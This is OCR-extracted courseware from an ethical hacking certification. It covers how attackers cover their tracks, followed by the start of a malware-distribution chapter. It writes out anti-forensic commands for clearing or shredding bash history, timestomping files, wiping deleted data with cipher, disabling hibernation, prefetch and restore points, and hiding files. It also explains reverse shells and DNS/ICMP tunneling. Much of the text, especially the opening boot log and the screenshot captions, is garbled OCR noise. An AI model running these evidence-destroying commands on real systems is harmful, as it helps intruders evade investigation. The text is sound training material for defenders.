fi][@;1;39mSet console font and keymapij][0 [{;][@;1;39mTell Plymouth To Write Out Runtime Datafjj][om...
Starting
[{:][@;1;39muncomplicated
13 16
»
|/€825 -FB9ch][om.
> |
Starting [i3][@;1;39mCreate Volatile Files and Directories[fj][@m...
17
18
19 [f]le;32m 20 [[i:](0;32m
21 ([3][0;32m 22 [fiJ[@;32m 23 [fz](@;32m 24 [[](0;32m
Mounting f;][@;1;39mArbitrary Executable File Formats File Systemfjj][om... OK OK
[lm] Finished [][@;1;39mSet console font and keymapfj][om. [{3)[Om] Finished [:|[@;1;39mTell Plymouth To Write Out Runtime Data[][om.
ok
[{:)[om] Mounted [][@;1;39mArbitrary Executable File Formats File Systemf)[om.
ok ok ok
formats{j][om.
25 [fiJlo;32m
firewall fj][om. ..
ok
[f3][om] Finished [i:][@;1;39mUncomplicated firewall fi][om. [)[om] Reached target [fjJ[0;1;39mPreparation for Network{][om.
[{3)[om] Finished [{3][0;1;39mEnable support for additional executable binary
[fi[om] Finished []][0;1;39mCreate Volatile Files and Directories[i][om.
26
Starting
28 29
Starting fi3][@;1;39mNetwork Time Synchronizationfij][om. Starting [i3][@;1;39mRecord System Boot/Shutdown in UTMP[j][Om...
27
30 [[3](0;32m
31 [[i:][@;32m
[j][@;1;39mUserspace
Out-Of-Memory
(OOM)
Killerfij][om...
Starting [:][@;1;39mNetwork Name Resolution[ij][om...
OK OK
[fiom] Finished [i][0;1;39mRecord System Boot/Shutdown in UTMP[3][om. [{3][@m]
Listening
on
ff]
}9mLoad/Save
RF Kill
Switch
Status
Plain Text ~ Tab Width: 8 v
/dev/rfkill
Ln2,col68
watchfii[@m.
Ys
INS
Figure 6.210: Clearing event logs for Linux
Module 06 Page 913
Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Ways to Clear Online Tracks ‘|@
CE H
Remove the Most Recently Used (MRU), delete cookies, clear the cache, turn off Autocomplete,
and clear the Toolbar data from the browsers
From the Privacy Settings inWindows 11
@ @
Right-clickon the Start button, choose Settings, and click on “Personalization” In Personalization, click Start from the left
pane and Turn Off both “Show most used
apps” and “Show recently opened items in Start, Jump Lists, and File Explorer”
@¢==@
From the Registry in Windows 11
© Open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\ _ Microsoft\Windows\CurrentVersion\
2
eos
Explorer and then remove the key for
“RecentDocs”
-_ @— 2
©
J
Delete all the values except
Py
"(Default)"
A al.
4
Ways to Clear Online Tracks Attackers can clear online tracks maintained using web history, logs, cookies, cache, downloads, visited time, etc. on the target computer so that the victims cannot notice what online activities the attackers have performed.
What can attackers do to clear their online tracks? =
Use private browsing
=
Delete history in the address field
=
Disable stored history
=
Delete user JavaScript
=
Delete private data
=
Set up multiple users
=
Clear cookies on exit
=
Remove Most Recently Used (MRU)
=
Clear cache on exit
=
Clear toolbar data from browsers
=
Delete downloads
=
Turn off AutoComplete
=
Disable password manager
To clear the online different OSs.
Module 06 Page 914
tracks of various
=
Clear data in the password manager Delete saved sessions
activities,
attackers
should
follow
different
paths for
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking The steps to clear online tracks from (Windows 11) are as follows: =
=
Exam 312-50 Certified Ethical Hacker the
Privacy
Settings
or from
the Windows
registry
From the Privacy Settings in Windows 11 o
Right-click on the Start button, choose Settings, and click on Personalization
o
In Personalization, click Start from the left pane and turn off both “Show most used apps” and “Show recently opened items in Start, Jump Lists, and File Explorer”
From the Registry in Windows 11 o
Open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer and then remove the key for “RecentDocs”
o.
Delete all the values except “(Default)”
Module 06 Page 915
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Covering BASH Shell Tracks (@
The BASH is an sh-compatible shell that stores command history ina
file called bash_history
@ You can view the saved command history using the more~/.bash_history command Attackers use the following commands to clear the saved command history tracks: |@ Disabling history © export BISTSIZE=0 | Clearing the history © history -c (Clears the stored history) @ history -w (Clears history of the current shell) |@ Clearing the user's complete history © cat /dev/null > ~.bash history 66 history -c 66 exit |@ Shredding the history © shred ~/.bash_history (Shreds the history file, making its content unreadable) @ shred ~/.bash history 66 cat /dev/null > -bash_history && history -c 66 exit (Shreds the history file and clears the evidence of the command)
Copyright © by
Al Rights Reserved Reproduction i
Covering BASH Shell Tracks Bourne Again Shell, or Bash, is an sh-compatible shell that stores command history in a file called the bash history. You can view the saved command history using the more ~/.bash_history command. This feature of Bash is a problem for hackers, as investigators could use the bash_history file to track the origin of an attack and the exact commands used by an intruder to compromise a
system.
Attackers use the following commands to clear the saved command history tracks: =
Disabling history export
HISTSIZE=0
This command disables the Bash shell from saving history. HISTSIZE determines the number of commands to be saved, which is set to 0. After executing this command, attackers lose their privilege to review the previously used commands. =
Clearing the history ©
history
-c
This command is useful in clearing the stored history. It is an effective alternative to disabling the history command as, in this command, an attacker has the convenience of rewriting or reviewing the earlier used commands. ©
history
-w
This command only deletes the history of the current shell, whereas the command history of other shells remains unaffected.
Module 06 Page 916
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking =
Clearing the user’s complete history cat
/dev/null
>
~.bash_history
&&
history
This command deletes the complete command and exits the shell. =
-c
&&
exit
history of the current and all other shells
Shredding the history ©
shred
~/.bash_history
This command shreds the history file and renders its contents unreadable. It is useful when an investigator locates the file, but owing to this command, becomes unable to read any content in the history file. o
shred ~/.bash_history&& history -c && exit
cat
/dev/null
>
.bash_history
&&
This command first shreds the history file, then deletes the file, and finally clears all the evidence of its usage.
Figure 6.211: Covering Bash shell tracks
Module 06 Page 917
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Covering Tracks on a Network
CE H
‘@ The attacker installs a reverse HTTP shell on the victim’s machine, which is programmed in such a way that it would ask for commands from an external master who controlsthe reverse HTTP shell
sing) RESErse) HTTP Shells
@ The victim here willact as a web client who is executing HTTP GET commands, whereas the attacker behaves like a web server and respondsto the requests 2
@ This type of trafficis considered as normal traffic by an organization’snetwork perimeter security controlslike DMZ, firewall, etc. @ The attacker uses an ICMP tunneling technique to use ICMP echo and ICMP reply packetsas a carrier of the TCP payload, toaccessor controla system stealthily oe system an @ The victim’s is triggered to encapsulate the TCP payload ;in an ICMP echo packet that Fis forwarded to the proxy server
Using Reverse ICMP Tunnels
© Organizations have security mechanisms that only check incoming ICMP packets but not outgoing ICMP packets, therefore attackers can easily bypass the firewall
Covering Tracks on a Network (Cont’d) ‘@
Using DNS Tunneling
|
Attackers can use DNS tunneling to encode malicious content or data of other programs
within DNS queries and replies
Ns tunneling createsa back channel to access a remote server and applications
| @ Attackers can make use of this back channel to exfiltrate stolen, confidential, or sensitive information from the server
, Using
CE H
TCP
Parameters 4
‘@
TCP parameters can be used by the attacker to distribute the payload and
‘@
TCP fields where data can be hidden are as follows:
to create covert channels ©
IP Identification field
@
TCPacknowledgement number
@
TCPinitial sequence number
s Reserved Reproduction is Strictly Prohibited
Covering Tracks on a Network =
Using Reverse HTTP Shells
An attacker starts this attack by first infecting a victim’s machine with malicious code, and thereby installing a reverse HTTP shell on the victim’s system. This reverse HTTP shell is programmed in such a way that it asks for commands to an external master, which controls the reverse HTTP shell on a regular basis. This type of traffic is Module 06 Page 918
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
considered normal by an organization’s network perimeter security controls like DMZ, firewall, etc. Once an attacker types something on the master system, the command is retrieved and executed on the victim’s system. The victim here acts as a web client who executes the HTTP GET commands, whereas the attacker behaves like a web server and responds to the requests. Once the previous commands are executed, the results are sent in the next web request. All the other users in the network can normally access the Internet; therefore, the traffic between the attacker and the victim is seen as normal. =
Using Reverse ICMP Tunnels
Internet Control Message Protocol (ICMP) tunneling is a technique in which an attacker uses ICMP echo and reply packets as carriers of TCP payload, to stealthily access or control a system. This method can be used to easily bypass firewall rules, because most organizations have security mechanisms that only check incoming ICMP packets but not outgoing ones. An attacker first configures the local client to connect with the victim. The victim’s system is triggered to encapsulate a TCP payload in an ICMP echo packet, which is forwarded to the proxy server. The proxy server de-encapsulates and extracts the TCP payload, and then sends it to the attacker. =
Using DNS Tunneling Attackers can use DNS tunneling to encode malicious content or data of other programs within DNS queries and replies. DNS tunneling usually includes data payload that can be added to the victim’s DNS server to create a backchannel to access a remote server and applications. Attackers can employ this backchannel information from the server.
to exfiltrate stolen, confidential,
or sensitive
Attackers perform DNS tunneling in various stages; first, they compromise an internal system
to
create
a
connection
with
an
external
network.
Then,
they
use
that
compromised system as a command and control server to remotely access the system and transfer files covertly from within to outside the network. =
Using TCP Parameters
TCP parameters can be used by the attacker to distribute the payload and to create covert channels. Some of the TCP fields where data can be hidden are as follows: ©
IP Identification Field: This is an easy approach in which a payload is transferred bitwise over an established session between two systems. In this approach, one character is encapsulated per packet.
Module 06 Page 919
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
o
TCP Acknowledgement Number: This approach is quite difficult as it uses a bounce server that receives packets from the victim and sends it to an attacker. Here, one hidden character is relayed by the bounce server per packet.
o
TCP Initial Sequence Number: This method also does not require an established connection between the two systems. Here, one hidden character is encapsulated per SYN request and reset packet.
Module 06 Page 920
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Covering Tracks on an OS Windows
£y
UNIX/LINUX
&
|@ NTFS hasa feature known as Alternate Data Streams that
@ Files in UNIX can be hidden just by appending a dot (.) in
@ Given below are some steps to hidea file using NTFS: © Open the command prompt with an elevated privilege
@ Attackers can use this feature to edit the log files to cover their tracks
allows attackers to hide a file behind normal files
@ Type the command“type
C:\SecretFile.txt
front of a file name
>
C:\LegitFile. txt:SecretFile.txt” (here, the file is kept in C drive where the SecretFile.txt file is hidden inside LegitFile.tt file) © To view the hidden file, type “moze < C:\SecretFile. txt’ (for this youneed to know the hidden file name)
@
Attackers can use the “export
HISTSIZE=0”
command
to delete the command history and the specific command they used to hide log files
IB Adminstrator Command Promst
Copyright © by
iy Prohibited.
Covering Tracks on an OS =
Windows NTFS has a feature called ADS that allows attackers to hide a file behind other normal files. Steps to hide files using NTFS are as follows: o
Open the command prompt with an elevated privilege
o
Type the command “type C:\SecretFile.txt >C:\LegitFile.txt:SecretFile.txt” (here, the file is kept in the C drive where the SecretFile.txt file is hidden inside the LegitFile.txt file)
o
To view the hidden file, type “more know the hidden file name)
< C:\SecretFile.txt” (for this you need to
EBX Administrator: Command Prompt
-
oO
x
Figure 6.212: Covering tracks on Windows OS
Modifying Time timestomp
file_name.doc
-z
“
”
(or) Module 06 Page 921
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
powershell -Command Date) .AddHours (-10)"
"(Get-Item
$File_name)
.LastWriteTime
=
$(Get-
This command is useful for changing the access time of specific files. Using this command, an attacker can rewrite the date and time of last access to hide traces and mislead the investigation. =
UNIX/LINUX
Files in UNIX can be hidden just by appending a dot (.) in front of a file name. In UNIX, each directory is subdivided into two directories: current directory (.) and parent directory (..). Attackers give these a similar name like “. ” (with a space after . ). These hidden files are usually placed in /dev, /tmp, and /etc. An attacker can also edit the log files to cover their tracks. However, sometimes, using this technique of hiding files, an attacker can leave his/her trace behind because the command he/she used to open a file will be recorded in a .bash_history file. A smart attacker knows how to overcome such a problem; he/she does so by using the export HISTSIZE=0 command.
Figure 6.213: Covering tracks on UNIX OS
Modifying Date and Time ©
touch
-a
-d
'
'
$File_name
The above command is useful for changing the access time of a specific file. Using the touch command, attackers can change the date and time as per their requirement. This command is executed only if an attacker can manage to steal admin credentials. o
touch
-m
-d
'
'
$File_name
Attackers can also use the same command with the parameter “-m” to change the date and time of last modification to mislead security professionals. In both cases, the parameter “d” updates the modification or access date/time.
Module 06 Page 922
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Delete Files using Cipher.exe @ Cipher.exe is an in-built Windows command-line tool that can be used to securely delete data by overwriting it to avoid their recovery in the future @ To overwrite deleted files in a specific folder: cipher /w::\
@ To overwrite all the deleted files in the given drive: cipher /w:
I Administrator: Command Prompt
Conyright © by
Al Rights Reserved. Reproduction i Strictly Prohibited.
Delete Files using Cipher.exe Cipher.exe is an in-built Windows command-line tool that can be used to securely delete data by overwriting them to avoid recovery in the future. This command also assists in encrypting and decrypting data in NTFS partitions. When an attacker creates and encrypts a malicious text file, at the time of the encryption process, a backup file is created. Therefore, if the encryption process is interrupted, the backup file can be used to recover the data. After the completion of the encryption process, the backup file is deleted, but this deleted file can be recovered using data recovery software and can then be used by security personnel for investigation. To avoid data recovery and cover their tracks, attackers use the Cipher.exe tool to overwrite the deleted files, first with all zeroes (0 x 00), second with all 255s (0 x FF), and then finally with random numbers. The attacker can delete files using Cipher.exe by implementing the following steps: =
Launch command prompt with administrator privileges
=
Use the following command to overwrite deleted files in a specific folder: cipher
=
/w::\
Use the following command to overwrite all the deleted files in the given drive: cipher
Module 06 Page 923
/w:
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
EBX Administrator: Command Prompt
-
o
xX
Figure 6.214: Screenshot of Cipher.exe command
Module 06 Page 924
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Disable Windows
Exam 312-50 Certified Ethical Hacker
Functionality
Disable the Last Access Timestamp
C iE H
Be Basson Sorenson
oe
*
—_—_— fsutil is a utility in Windows used to set the NTFS.
|
volume behavior parameter, DisableLastAccess,
which controls enabling or disabling of the last access timestamp
Disable Windows Hibernation
. Tenpener TREY LOCAL MACHINE SYSTEM CurrertControlser\Contran Power I
Disable Windows hibernation using the Registry
Editor or powercfg command
——
“_
Se
fms
rpm
Sa
ie So Sone cosmo) a ‘econo ane
Disable Windows Functionality (Cont’d) Disable Windows Virtual Memory
(Paging File)
x
CE H
Disable System Restore Points
Al Rights Reserved. Reproduction i Strictly Prohibited
Module 06 Page 925
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
Disable Windows Functionality (Cont’d) Disable
Windows Thumbnail Cache
[an
co
Disable
CE H Windows
Prefetch Feature
|
Disable Windows Functionality =
Disable the Last Access Timestamp The last access timestamp of a file contains information regarding the time and data when the specific file was opened for reading or writing. Therefore, every time a user accesses a file, the timestamp is updated. Attackers use the fsutil tool to disable or
enable the last access timestamp.
fsutil is a command-line utility in the Windows OS used to set the NTFS volume behavior parameter, DisableLastAccess, which controls the enabling or disabling of the last access timestamp. For example, DisableLastAccess
= 1
DisableLastAccess
= 0 indicates that the last access timestamps are enabled.
Module 06 Page 926
indicates that the last access timestamps are disabled.
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
As shown in the screenshot, attackers use the following command access updates: >fsutil
behavior
set
disablelastaccess
to disable the last
1
-
[BW Administrator: Command Prompt
ia)
x
Figure 6.215: Screenshot of fsutil command
=
Disable Windows Hibernation The hibernate file (Hiberfil.sys) is a hidden system file located in the root directory where the OS is installed. This file contains information regarding the system RAM stored on a hard disk at specific times (when the user selects to hibernate his/her system). This information is crucial as security personnel can use it to investigate an attack on the system. Therefore, disabling Windows hibernation is a crucial step toward covering the tracks. The attacker can disable Windows hibernation through the registry by implementing the following steps: o
Open Registry Editor and navigate to the following location: Computer\HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\P
ower o
Double-click on HibernateEnabledDefault from the right pane; an Edit DWORD bit) Value dialog box appears
o.
Inthe Value data: field, enter a value of 0 to disable hibernation
o
Press OK
Module 06 Page 927
(32-
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
8
Edit
|
Vie
Exam 312-50 Certified Ethical Hacker
Help lodeinterface Notifications blll Sfp seston Ba pnp var Enanyjfatel odernSler poc Ba Powerrequ > Ta PowerSettir ‘De Profile
1 Type REG_SZ REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD.
|| Name || 38) (Default) 3] Class InitialUnparkCount CustomizeDuringSetup EnergyEstimationEnabled EventProcessorgnabled HiberFileSizePercent || a HibernateEnabledDefaut idReliabilityState MfBufferingThreshold ) || 2) PerfCalculateActualUtilizatiog 3) SourceSettingsVersion
SecurityDes | || $3) TimerRebaseThresholdOnDr Sync
Data (value net set) 000000040 (64) 000000001 (1) 000000001 (1) 00000001 (1) 000000000(0) 000000001 (1) 000000001 (1) 000000000(0) 000000001 (1),
Edit DWORD (32-bit) Value Value name:
HibemateEnabledDefaut
‘DB User
> Ea Print
Value data:
&> © reac RadioManage:
Base
a
‘Dy ProductOptior
4
ee O Decimal ie
Remote Assist
|
RetailDemo
‘Bi SafeBoot
ok §
Cancel
Figure 6.216: Screenshot of Registry Editor to disable hibernation
Attackers can also disable Windows implementing the following steps:
through
o
Launch command prompt with administrator privileges
o.
Use the following command to disable hibernation: powercfg.exe
=
hibernation
/hibernate
command
prompt
by
off
Disable Windows Virtual Memory (Paging File) Virtual memory, also called a paging file, is a special file in Windows that is used as a compensation when RAM (physical memory) falls short of usable space. For example, if an attacker has an encrypted file and wants to read it, he/she must first decrypt it. This decrypted file stays in the paging file, even after the attacker logs out of the system. Moreover, some third-party programs can be used to store plaintext passwords and other sensitive information temporarily. Therefore, disabling paging in Windows is a crucial step toward covering tracks. The attacker can disable paging by implementing the following steps: 1.
Open Control Panel and navigate to the following location:
System and Security > System 2.
> Advanced system settings
A System Properties dialog box appears; in the Advanced tab, click on Settings... under the Performance section
Module 06 Page 928
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
3.
Exam 312-50 Certified Ethical Hacker
A Performance Options dialog box appears; go to the Advanced tab and click on Change... under the Virtual Memory section
4.
A Virtual Memory size for all drives
5.
Select the drive where paging should be disabled, then check the option No paging file and click Set
6.
In the System Properties window, click Yes
7.
Finally, click OK to implement the changes
«
4
dialog box appears; uncheck Automatically manage
@_> ControlPanel > System and Security
ogy Home ‘¢ System and Security Network and Internet Hardware and Sound Programs User Accounts Clock and Region
Face of Access
by
pete Q
Admin Local Account setting
° Bluetooth & devices ‘%
Network & internet
Personalization WE Apps S
Accounts
D Time & language @ Gaming K Accessibilty @
Privacy & security
@
Windows Update
paging file
)
Veualeffects Advanced Data Exeauton Preventon Processors Choote he CiAutomatically manage paging file sie forall drives Adjust for Paging filesize for each dive Drive [Volume Label] Paging File Size (MB) Computer Name Hardwa © Brogran E [New Volume] ‘None You must be logged on} Peomance Virtual men Vasual eect, process Apaging System Properties were RAM, ityou disable the paging file or st the initial size to less than Total pagin 400 megabytes and a system error occurs, Windows might not record deals that could help identity the problem. Do you User Proes ‘want to continue? Desktop settings relate
e
S
Statup and Recovery System startup, oyster,
O System managed size
Bisaaaate] System > System protection o
A System Properties dialog box appears; in the System drive and click on Configure...
Module 06 Page 929
Protection tab, select the
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
o
Under the Restore Settings section, select the Disable system protection option and click on the Delete button
oO
The System Protection wizard appears; click Continue to delete all restore points on the drive
o
Click OK
co
Repeat the above steps for all disk partitions
s «
-
©
> Control Panel
cata ie asgescnagselaiay
> System and Security
ee Cuctam
Admin
Network and Intemet Programs
Computer Name
Personalization
Hardware
Advanced
+ Ahaut
System Protection
Remote
eas Sytem Restore meceeoresay Wigton Re aR cm adsense RS So Ra tioRelate!
PC
this
Rename
Use system protection to
tin
F
Clock and Reon wasn
2
.
| a ©
system
WO,
Bisetooth &
[Obeaiermennan|
he Local Disk C) (System)
Apps
S
Accounts
tan iin
Available Dives
Personalizati
elon
A
ee
| Configure restore settings, mand)
3 Time & lang
© coming K
Accessibility,
@
Privacy & security
K
OTum on system protection
Cen. | iacciabis 7
|
ep rolmredoets Tterete o cae a ator port. i
x
You will not be able to undo unwanted system changes on this
drive. Are you sure you want to continue? This will delete all restore
backing
on this drive. ke points
This might
e
include older
. Del te
a estore pants for ths ve
cS) (a)
.
system image
mt
Caneel
,
@l=]
cores
sooty
Figure 6.218: Screenshot of disabling restore points through Control Panel
o
Disable Windows Thumbnail Cache thumbs.db is a Windows file that stores thumbnails of document types such as PPTX and DOCX, and graphic files such as GIF, JPEG, PNG, and TIFF. This thumbnail file contains information regarding files that were previously deleted or used on the system. For example, if an attacker has used an image file to hide a malicious file and later deleted it, a thumbnail of this image is stored inside the thumbs.db file, which reveals that the deleted file was previously used on the system.
Module 06 Page 930
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
The attacker can disable the thumbnail cache by implementing the following steps: o
Press Windows + R keys to open the Run dialog box
©.
Type gpedit.msc and press Enter or click OK
o
The Local Group Policy Editor window appears; navigate to User Configuration > Administrative Templates > Windows Components > File Explorer
o
Double-click on the Turn off the caching of thumbnails in hidden thumbs.db files setting from the right pane
o
Select Enabled to turn off the thumbnail cache
©
Click OK
File Action
View
Help
© | 21) | BLE gs sm oft the caching of thumbnails in hidden thumbs. files ¥ 15] Windows Compon ‘Add features to EE] Tum off the caching of thumbnails in hidden thumbs.db fles App runtime Application ntCol a attachme Mg ONotConfigured Comment: (5) AutoPlay Polic @ Calculator (3 Cloud Content O Disabled
(5) Credential User
1 Data Collection
(Gl Desktop Gadge > © Desktop Windo Options:
1 Digital Locker
i Edgeige vl v © File Explorer (| CommonQ} Explorer Fed Bp reviou ae s | (G File Revocation
i ime Instanet Search. pe | > el Location jon an aaiil| Microsoft Edge > 15) Microsoft Mani}
‘Supported on:
o
x
ious seting || Next Setting
I
Pack 1 Service s Vista ow Wind
Help: ‘Tums jurns off the cachica hing ng of thumbnthumbnails ails in hidden b filfiles. hidden thumbs thumbs.d.db This policy setting allows you to configure File Explorer to cache
thumbnails of items residing in network folders in hidden thumbs.db files.
If you enable this policy setting, File Explorer does not create,
b read from, or write to thumbs.dfiles.
g, rer you s,disable or donot configure this mbs policy settin Fil Explo ‘create reads from, and writes to thu .db files.
> (9 Microsoft User:
(5 Matitasking > [5 NetMeeting
(3 Network Sharin @ oose
1 PresentationSe
asstees
> 1 Remote Deskto
cone)
t0y _)
AT setting(s) Figure 6.219: Screenshot of disabling the thumbnail cache in Local Group Policy Editor
Module 06 Page 931
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
=
Exam 312-50 Certified Ethical Hacker
Disable Windows Prefetch Feature Prefetch is a Windows feature that stores specific data about the applications that are typically used by the system users. The stored data help in enhancing system performance by reducing the time required to load or start applications.
For example, if an attacker has installed a malicious application and then uninstalled it, a copy of that application will be stored in the Prefetch file. These Prefetch files can be used by security personnel to recover deleted files during the investigation of a security incident. Attackers can disable the Prefetch feature by implementing the following steps: o
Press Windows + R keys to open the Run dialog box
©.
Type services.msc and press Enter or click OK
o
Search for the SysMain (Superfetch) service and double-click it to open Properties (Local Computer)
o
From the drop-down options in Startup type, select the Disabled option
o
Click OK
File Action View Help ¢9|\miG os|\ari~ __ SysMain Properties (Local Computer) ), Services (Local) Gonwrt [LouCol eeerey gl ewes) Sys Service name: SysMain Stop the serv eee the s¢ Restart Descipion: Martane and improves stem pefomance over Description: ‘Maintains an Path to executable: performance C:AWindows\system32\svchostexe LocalSystemNetworkResticted p
[seed
ene
‘Aitomatic (Delayed Star) ‘Atomatic
x
—_ Status Startup Type Disabled Running Automatic Manual (Trig... Manual (ig... Manual Manual Automatic (.. Running
Manual
Service status: — — —— 3 Sep ae =— You can specty the stat parameters that apply when you stat the service
from here.
=
feply
Von
Manual
Running
Automatic
Running
Automatic
Manual Running Automatic (.. Manual Running Automatic (.. Running Running Running {Running Running
Automatic Automatic (T... Automatic (.. Automatic Manual (Trig...
SysMain
Log Loc: Loci Loci Loc: Loc: Loc: Neb
ioe
Loc: Loc
Loc: Loci Loc: Loci Loc
Loci Loci Loci Loc: Loci
Extended { Standard
Figure 6.220: Screenshot of disabling the Superfetch service
Module 06 Page 932
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Hiding Artifacts in Windows, Linux, and macOS Hiding Files and Folders in Windows
Hiding Users in Windows
Hiding User Accounts in Windows
Hiding Artifacts in macOS ater = 7) =10620
Copyright © by
Hiding Artifacts in Windows,
Al Rights Reserved. Reproductio
Linux, and macOS
Attackers often attempt to conceal artifacts corresponding to their malicious behavior to bypass security controls. Every OS hides its artifacts such as internal task execution artifacts and critical system files. Attackers leverage this OS feature to conceal their artifacts such as directories, user accounts, files, folders, or any other system-related artifacts within existing artifacts to evade detection. Hiding Artifacts in Windows =
Hiding Files and Folders Attackers use the following command folder in a Windows system: attrib
Module 06 Page 933
+h
+s
+r
with administrator privileges to hide any file or
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Command Prompt ir C ha: Number
Network and Sharing Center > Change Advanced Sharing Settings. Select a network profile and under File and Printer Sharing section, select Turn off file and printer sharing. This will prevent file sharing abuse. =
Installation by other Malware A piece of malware that can command and control will often be able to re-connect to the malware operator’s site using common browsing protocols. This functionality allows malware on the internal network to receive both software and commands from the outside. In such cases, the malware installed on one system drives the installation of other malware on the network, thereby causing damage to the network.
=
Bluetooth and Wireless Networks Attackers use open Bluetooth and Wi-Fi networks to attract users to connect to them. These open networks have software and hardware devices installed at the router level to capture the network traffic and data packets as well as to find the account details of the users, including usernames and passwords.
Module 07 Page 952
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Common Techniques on the Web
Exam 312-50 Certified Ethical Hacker
Attackers Use to Distribute Malware
Black hat Search Engine Optimization (SEO) @ Ranking malware pages highly in search results
Compromised Legitimate Websites Hosting embedded malware that spreads to unsuspecting visitors
Social Engineered Click-jacking @ Tricking users into clicking on innocent-looking webpages
Drive-by Downloads Exploiting flaws in browser software to install malware just by visiting a web page
Spear-phishing Sites @ Mimicking legitimate institutions in an attempt to
steal login credentials
Malvertising |@ Embedding malware in ad-networks that display across hundreds of legitimate, high-traffic sites
cE H
=|
Spam Emails Attaching the malware to emails and tricking victims to click the attachment
RTF Injection Injecting malicious macros into an RTF file and tricking users to open the malicious document
Common Techniques Attackers Use to Distribute Malware on the Web Source: Security Threat Report (https://www.sophos.com) Some standard techniques used to distribute malware on the web are as follows: Black hat Search Engine Optimization (SEO): Black hat SEO (also referred to as unethical SEO) uses aggressive SEO tactics such as keyword stuffing, inserting doorway pages, page swapping, and adding unrelated keywords to get higher search engine rankings for malware pages. Social Engineered Click-jacking: Attackers inject malware into websites that appear legitimate to trick users into clicking them. When clicked, the malware embedded in the link executes without the knowledge or consent of the user. Spear-phishing Sites: This technique is used for mimicking legitimate institutions, such as banks, to steal passwords, credit card and bank account data, and other sensitive information.
Malvertising: This technique involves embedding malware-laden advertisements in legitimate online advertising channels to spread malware on systems of unsuspecting
users.
Compromised Legitimate Websites: Often, attackers use compromised websites to infect systems with malware. When an unsuspecting user visits the compromised website, he/she unknowingly installs the malware on his/her system, after which the malware performs malicious activities.
Module 07 Page 953
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
=
Drive-by Downloads: This refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware by merely visiting a website.
=
Spam Emails: The attacker attaches a malicious file to an email and sends the email to multiple target addresses. The victim is tricked into clicking the attachment and thus executes the malware, thereby compromising his/her machine. This technique is the most common method currently in use by attackers. In addition to email attachments, an attacker may also use the email body to embed the malware.
=
